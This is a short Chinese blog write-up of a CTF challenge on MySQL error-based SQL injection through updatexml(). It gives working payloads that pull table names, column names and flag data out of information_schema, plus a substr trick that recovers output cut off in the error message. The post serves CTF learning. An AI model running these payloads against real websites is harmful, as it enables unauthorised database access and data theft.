SQL-报错注入
updatexml报错注入
updatexml (XML_document, XPath_string, new_value):
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,了解Xpath语法。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
利用updatexml查询功能,构造报错语法,将查询结果用报错的形式输出
例题:[SWPUCTF 2021 新生赛]error
随便输入1进去,发现没有变化;
因为知道是报错注入,就构造paylaod
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --+
输入进去还果真“报错”,但不是我们要的报错结果,就抓了一下包
果然是出现了错误,将包改为我们要的形式,再放回
查到了库名,用相同的方式,查找表名
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='test_tb')),1) --+
继续查找flag
1' and updatexml(1,concat(0x7e,(select flag from test_tb)),1) --+
发现只有前半截flag
1' and updatexml(1,concat(0x7e,substr((select flag from test_tb),32,64)),1) -- +
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具